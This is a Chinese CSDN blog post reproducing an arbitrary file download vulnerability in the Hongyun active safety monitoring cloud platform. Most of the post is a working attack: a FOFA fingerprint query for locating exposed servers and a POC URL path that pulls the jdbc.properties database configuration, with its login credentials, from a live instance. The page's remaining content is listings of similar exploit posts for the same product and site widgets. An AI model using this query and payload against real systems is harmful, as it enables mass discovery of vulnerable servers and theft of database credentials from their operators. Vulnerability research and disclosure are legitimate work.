鸿运主动安全云平台任意文件下载漏洞复习

最新推荐文章于 2024-09-27 20:07:43 发布
最新推荐文章于 2024-09-27 20:07:43 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134212198
版权
漏洞复现 专栏收录该内容
36 篇文章 17 订阅 ¥9.90 ¥99.00
订阅专栏
本文介绍了深圳市强鸿电子有限公司的鸿运主动安全监控云平台存在的任意文件下载漏洞,攻击者能通过特定POC下载如数据库配置文件等敏感信息。建议采取访问白名单、增加访问控制及严格限制策略进行修复。文章强调了信息安全的重要性,并提醒读者合法使用相关技术。
摘要由CSDN通过智能技术生成

简介

深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码

漏洞复现

FOFA语法:body="./open/webApi.html"

获取网站数据库配置文件

POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

可直接下载到该文件

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
专栏目录
订阅专栏
鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
10-25 745
监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。 深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。
漏洞复现】安全云平台存在任意文件下载getshell
失心少年
10-13 752
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息。1.利用GET请求如下POC可得到验证。
鸿运主动安全云平台任意文件下载漏洞
CommputerMac的博客
10-12 448
深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息,获取数据库账号密码,从而为下一步攻击做准备。例:读取数据库配置文件。
鸿运(通天星CMSV6车载)主动安全监控云平台任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-27 680
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。鸿运(通天星CMSV6车载)主动安全监控云平台
鸿运主动安全监控云平台存在任意文件读取漏洞 附POC
nnn2188185的博客
11-29 326
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
鸿运(通天星CMSV6车载)主动安全监控云平台inspect_file/upload存在任意文件上传漏洞
wan___she__pi的博客
04-04 893
鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
鸿运主动安全监控云平台任意文件下载漏洞
qq_67810151的博客
02-24 414
深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。
鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞
qq_36334672的博客
03-09 431
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。
北斗主动安全监控平台downloadLogger.action任意文件读取(含批量验证poc)
weixin_43567873的博客
04-18 169
北斗主动安全监控平台downloadLogger.action任意文件读取(含批量验证poc)
部标主动安全云平台后台正式免费开放
gps_pro的博客
09-08 4765
今年走访了一些行业内的客户,总结了一些常见的问题: 很多运营商都想开发一套属于自己的部标主动安全平台,部标协议推出至今十年了,协议类型加地市级扩展的有JT808-2011、JT808-2013、JT1078、主动安全、JT808-2019、JT809,从零开发都是一场噩梦。 投入的资金人力很大,开发周期长,还需要有对终端协议和行业需求特别熟悉的人才。今年疫情特殊,很多企业在缩减开支,不敢盲目投入太多资金。 系统架构要成熟稳定。网上开源的代码只是demo离商用还有很大差距,或者代码质量差架构落后导致学习成本
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 424
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 931
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 341
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 539
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 915
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
【中关村在线-注册/登录安全分析报告】
09-23 942
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
黎巴嫩BP机爆炸事件启示录:我国应加快供应链安全立法
09-21 1320
据报道,当地时间9月17日下午,黎巴嫩首都贝鲁特以及黎巴嫩东南部和东北部多地都发生了BP机爆炸事件。当时的统计数据显示,爆炸造成9人死亡,约2800人受伤。9月18日,死亡人数上升到11人,受伤人数超过4000。目前,整个事件仍在发酵之中,关于BP机是谁制造、谁运输、谁在其中动了手脚还在持续探索之中。这一事件也引发了人们对于供应链安全的广泛关注。供应链的任何环节,包括产品的源头、生产环节、运输过程...
北汽昌河福瑞达鸿运版汽车用户手册全面图解与车型更新说明
福瑞达鸿运版系列汽车的设计目标是提供一款新颖、安全、经济的车型,适合各类道路条件和国家法规。 此外,手册还附带了部品处理表,明确了福瑞达平地板系列车型的装车部品和售后部品的互换性规则。对于装车部品,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值